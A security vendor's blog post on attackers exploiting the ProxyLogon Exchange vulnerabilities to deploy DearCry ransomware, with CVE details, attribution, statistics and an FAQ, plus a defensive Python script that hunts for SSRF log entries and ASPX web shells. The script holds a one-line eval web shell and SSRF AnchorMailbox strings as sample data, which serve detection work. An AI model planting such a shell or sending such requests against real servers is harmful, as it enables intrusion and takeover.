Quick Summary: This blog looks at attackers exploiting vulnerable Microsoft Exchange servers to deploy ransomware. After breaking into a server, they encrypt its data and demand a ransom to restore access. The blog examines the attack's implications and how it may reshape cybersecurity practices. The incident underscores the pressing need for robust protective measures against evolving techniques, and it pushes organizations to bolster their security strategies and stay ahead in the ongoing battle against cyber threats.
A worrying trend has emerged in the constantly changing cybersecurity landscape: attackers using Exchange servers as the entry point for ransomware attacks. Simple data breaches give way to the outright takeover of critical systems, causing operational chaos and financial loss. This blog explores the risks of ransomware delivered through compromised Exchange servers.
Understanding the inner workings of these attacks is essential to bolster our defense strategies. You can get help from Security Testing Services.
In the following pages, we unravel the methods, motives, and potential countermeasures against this emerging breed of cyber threat.
Let's discuss the issue in detail: the Exchange Server ransomware attacks.
Hackers are exploiting vulnerable Exchange servers to drop ransomware attacks, Microsoft says.
Microsoft has warned that attackers are exploiting recently disclosed vulnerabilities in Exchange email servers to deploy ransomware. The move puts tens of thousands of email servers at risk of destructive attacks.
In a tweet late Thursday, the company said it had detected a new kind of file-encrypting malware, called DoejoCrypt or DearCry, which uses the same four vulnerabilities that Microsoft linked to the China-backed hacking group Hafnium.
When chained together, the vulnerabilities allow an attacker to take complete control of a vulnerable server.
Hafnium is the "primary" group exploiting the flaws, likely for espionage and intelligence gathering. But other security firms say they have seen other hacking groups use the same weaknesses: ESET reported that at least ten groups were actively compromising Exchange servers.
The new ransomware appeared less than a day after security researchers published proof-of-concept exploit code for the vulnerabilities on Microsoft-owned GitHub. GitHub removed the code shortly afterwards, saying it violated the company's policies.
A security researcher at Kryptos Logic said in a tweet that the code worked, albeit after some fixes.
RiskIQ reported detecting over 82,000 vulnerable servers as of Thursday, with the number declining. The company noted that hundreds of servers owned by banks and healthcare companies remained affected, along with over 150 servers within the U.S. federal government.
That is a rapid drop compared to the almost 400,000 vulnerable servers exposed when Microsoft first disclosed the vulnerabilities on March 2.
Microsoft released security patches last week, but patching does not evict an attacker who compromised a server before the patch was applied, so patched servers still need to be checked for web shells and other signs of intrusion. The FBI and CISA, the federal government's cybersecurity advisory agency, have warned that the vulnerabilities present a significant risk to businesses across the United States.
John Hultquist, vice president of analysis at FireEye's Mandiant threat intelligence unit, said he anticipates more ransomware groups trying to cash in.
What Are The Vulnerabilities And Why Are They Important?
ProxyLogon is a set of severe vulnerabilities affecting on-premises Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. Microsoft also updated Exchange Server 2010 for "defense-in-depth purposes."
- CVE-2021-26855 (CVSS 9.1): A server-side request forgery (SSRF) vulnerability that lets an unauthenticated attacker send crafted HTTP requests through the Exchange front end to back-end services. The server must accept untrusted connections on port 443 for this bug to be exploitable.
- CVE-2021-26857 (CVSS 7.8): An insecure deserialization vulnerability in the Exchange Unified Messaging service, allowing arbitrary code execution as SYSTEM.
- CVE-2021-26858 (CVSS 7.8): A post-authentication arbitrary file write vulnerability that lets an attacker write a file to any path on the server.
- CVE-2021-27065 (CVSS 7.8): A second post-authentication arbitrary file write vulnerability with the same effect; in practice the SSRF supplies the authentication these two bugs require.
Chained together, these vulnerabilities lead to remote code execution (RCE), server takeover, backdoors, data theft, and potentially further malware deployment.
In summary, Microsoft says that attackers gain access to the Exchange server either through these bugs or with stolen credentials, then write a web shell to disk so they can execute commands on the server remotely.
"These vulnerabilities are part of the attack chain," Microsoft says. "The initial attack requires the ability to make an untrusted connection to Exchange server port 443."
Restricting untrusted connections, or placing the Exchange server behind a VPN so it is not reachable directly from the internet, blocks this initial step.
This mitigation only protects against the first portion of the attack;
if an attacker already has access, or can convince an administrator to run a malicious file, they can trigger the other pieces of the chain.
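As an added hunting example (not code from the original post, from Microsoft, or from any of the firms quoted), the following Python script applies two of the indicators Microsoft published for this attack chain: HttpProxy log rows whose AnchorMailbox carries a ServerInfo~ value with a back-end path (the CVE-2021-26855 SSRF in use, the same pattern Microsoft's Test-ProxyLogon.ps1 searches for), and .aspx files in web-served folders that either match a one-line eval web shell or sit in aspnet_client, where no .aspx belongs. The log lines, file paths and file contents are constructed; the column subset and the folder list are assumptions that mirror the public IOC guidance rather than a complete copy of it.

```python
"""Hunt for ProxyLogon exploitation traces: CVE-2021-26855 SSRF requests in
Exchange HttpProxy logs, and ASPX web shells dropped into web-served folders."""
import csv
import re

# Constructed sample in the CSV layout of Exchange HttpProxy logs. Real files
# carry many more columns; only the ones this script reads are kept. Rows 0001
# and 0002 mimic the AnchorMailbox values seen in CVE-2021-26855 exploitation
# (the attacker steers the front end to a chosen back-end path); 0003 and 0004
# show the normal Sid~ / Smtp~ anchors.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,RequestId,ClientIpAddress,UrlStem,AnchorMailbox,HttpStatus
2021-03-03T10:15:01.000Z,0001,203.0.113.5,/owa/auth/x.js,ServerInfo~a]@contoso.local/autodiscover/autodiscover.xml?#,200
2021-03-03T10:15:02.000Z,0002,203.0.113.5,/ecp/y.js,ServerInfo~a]@contoso.local/mapi/nspi/?#,200
2021-03-03T10:16:00.000Z,0003,192.0.2.20,/owa/,Sid~S-1-5-21-1111-2222-3333-1001,200
2021-03-03T10:17:00.000Z,0004,192.0.2.21,/ecp/,Smtp~alice@contoso.com,200
"""

# Constructed stand-in for a directory walk of the Exchange host: path -> bytes.
# The first entry is a one-line "eval" web shell of the kind dropped in these
# attacks; the second is a legitimate OWA page in a folder that also received
# shells, so a path match alone must not be the only signal.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        b'<%@ Page language="C#" %><!-- legitimate OWA logon page (constructed) -->',
    r"C:\inetpub\wwwroot\aspnet_client\default.htm": b"<html></html>",
}

# Test-ProxyLogon.ps1 matches AnchorMailbox like 'ServerInfo~*/*': a ServerInfo~
# anchor that carries a path is the SSRF being used to reach a back-end endpoint.
SSRF_ANCHOR = re.compile(r"^ServerInfo~[^/]*/")
# aspnet_client is a static-content folder; any .aspx there is out of place.
ASPNET_CLIENT_DIR = "/inetpub/wwwroot/aspnet_client/"
# Crude content signature for one-line ASP.NET shells (Chopper-style eval).
SHELL_CONTENT = re.compile(rb"eval\s*\(\s*Request|Request\.(Item|Form)\s*\[", re.I)


def parse_httpproxy_log(text):
    """Turn HttpProxy CSV text into dicts keyed by the '#Fields:' header names."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if line.startswith("#"):  # other metadata lines
            continue
        if fields is None:
            raise ValueError("data row before #Fields: header")
        values = next(csv.reader([line]))
        rows.append(dict(zip(fields, values)))
    return rows


def find_ssrf_indicators(rows):
    """Return HttpProxy rows whose AnchorMailbox looks like CVE-2021-26855 abuse."""
    return [
        {"time": r["DateTime"], "client": r["ClientIpAddress"],
         "url": r["UrlStem"], "anchor": r["AnchorMailbox"]}
        for r in rows
        if SSRF_ANCHOR.match(r.get("AnchorMailbox", ""))
    ]


def find_webshell_candidates(files):
    """Flag .aspx files by content signature (high) or by living in
    aspnet_client, where no .aspx belongs (medium)."""
    hits = []
    for path, content in files.items():
        norm = path.replace("\\", "/").lower()
        if not norm.endswith(".aspx"):
            continue
        if SHELL_CONTENT.search(content):
            hits.append({"path": path, "severity": "high"})
        elif ASPNET_CLIENT_DIR in norm:
            hits.append({"path": path, "severity": "medium"})
    return hits


if __name__ == "__main__":
    for hit in find_ssrf_indicators(parse_httpproxy_log(SAMPLE_HTTPPROXY_LOG)):
        print("SSRF indicator:", hit)
    for hit in find_webshell_candidates(SAMPLE_FILES):
        print("Web shell candidate:", hit)
```

On a real host, point `parse_httpproxy_log` at every file under the Exchange `Logging\HttpProxy` folder and feed `find_webshell_candidates` the output of a walk over `inetpub\wwwroot` and `FrontEnd\HttpProxy`; any SSRF hit from an external address on a server that was unpatched on March 2 should be treated as a compromise to investigate, not merely a vulnerability to patch.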
Who Is Responsible For Known Ransomware Attacks?
Microsoft attributes the original attacks using the zero-day flaws to Hafnium.
The company describes Hafnium as a "highly skilled and sophisticated actor" and identifies it as a state-sponsored advanced persistent threat (APT) group operating from China.
While Hafnium operates from China, the group uses a web of leased virtual private servers (VPS) in the U.S. to conceal its true location. Entities previously targeted by the group include think tanks, non-profits, defense contractors, and researchers.
Is It Just The Hafnium?
When zero-day vulnerabilities are revealed and software vendors issue emergency fixes, the consequences can still be substantial, especially when popular software is affected.
Problems arise from slow awareness of new patches and slow adoption, and from the reasons IT staff may be unable to apply a fix: they may not know that the organization runs the affected software, third-party library, or component, or they may face compatibility problems.
Mandiant says further attacks against U.S. targets include local government bodies, universities, engineering companies, and retailers.
The cyber forensics firm believes that attackers could utilize the vulnerabilities for deploying ransomware and stealing data.
Cybersecurity expert Brian Krebs has been informed by sources that hackers have targeted at least 30,000 organizations in the U.S. According to Palo Alto Networks, there were a minimum of 125,000 unpatched servers worldwide as of March 9th.
On March 5, Microsoft said it continued to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond Hafnium.
On March 11, Check Point Research (CPR) said that attack attempts leveraging the vulnerabilities were doubling every few hours.
On March 15, CPR said that attack attempts had increased tenfold, based on data collected between March 11 and March 15.
The U.S., Germany, and the U.K. were the most targeted countries. Government and military targets accounted for 23% of all exploit attempts, followed by manufacturing, financial services, and software vendors.
As we dissect recent high-profile cases and explore the anatomy of these attacks, a grim reality emerges: the line between data protection and hostage negotiation has blurred as businesses struggle with the growing threat. Companies like BigScal become crucial allies in the battle against such intrusions.
BigScal's approach extends beyond traditional security paradigms. By encouraging a culture of vigilance and continual improvement, it enables businesses to foresee and minimize dangers before they materialize.
Combining current technology with proactive strategies can stem the rising tide of cyber threats and ensure that Exchange servers remain a conduit for communication rather than a gateway for criminal extortion. The road ahead is challenging, but with the right allies we can navigate it towards a safer and more secure digital future.
Do hackers use ransomware?
Yes, hackers often use ransomware as a malicious tool. Ransomware encrypts victims’ data and demands payment to provide the decryption key. It’s a profitable strategy for cybercriminals to extort money from individuals, businesses, and organizations. The victims’ urgency to regain access to their data increases the likelihood of payment. Prevention through cybersecurity measures and regular data backups is crucial to avoid falling victim to such attacks.
What was the Microsoft Exchange hack?
The Microsoft Exchange hack, discovered in early 2021, exploited vulnerabilities in Microsoft Exchange Server software. The cyberattack allowed hackers to gain unauthorized access to email accounts, steal data, and install malware. The attack affected thousands of organizations worldwide. Microsoft released patches to address the vulnerabilities, but the incident highlighted the need for prompt software updates and cybersecurity vigilance to prevent such breaches.
Which vulnerability affects Exchange servers?
One notable vulnerability that affected Exchange servers was known as “ProxyLogon.” It was a set of four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) discovered in Microsoft Exchange Server software. Exploiting these vulnerabilities allowed unauthorized access, data theft, and installation of web shells by attackers. Microsoft released emergency patches to address these vulnerabilities and urged users to update their systems promptly to prevent potential attacks.
What happens if you don’t pay ransomware?
If you don’t pay ransomware, you risk losing access to your encrypted data permanently. Cybercriminals may delete or destroy your files if the ransom is not paid within their specified timeframe. However, paying the ransom does not guarantee data recovery and may encourage further attacks. It’s important to assess options carefully and prioritize preventive measures like backups and cybersecurity.
Does wiping a computer remove ransomware?
Wiping a computer (formatting the drive and reinstalling the operating system) removes the ransomware along with everything else on the disk, including the encrypted files. Whether that means complete data loss depends on whether you hold offline or otherwise isolated backups taken before the infection; without them, wiping should be a last resort, and it is advisable to consult cybersecurity professionals and explore data recovery options first. Wiping also does nothing to close the path the attacker used to get in, so the vulnerability or stolen credentials behind the intrusion must be fixed before the rebuilt system goes back online.